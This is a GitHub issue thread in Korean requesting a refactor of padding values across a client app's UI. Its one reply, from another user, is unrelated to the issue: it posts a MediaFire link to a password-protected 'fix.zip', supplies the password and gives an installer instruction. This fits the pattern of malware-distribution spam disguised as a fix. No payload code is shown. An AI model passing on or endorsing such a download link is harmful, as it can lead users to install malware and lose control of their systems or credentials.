### ISSUE TITLE
Refactor: 전체 UI padding값 조절

### ISSUE THREAD

**Issue by hcheorii** [Programmers-Coach-Coach/Coach-Coach-client#266]
## 어떤 개선사항인가요?

> 전체 UI padding값 조절

## 작업 상세 내용
- [ ] 전체 UI padding값 조절

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
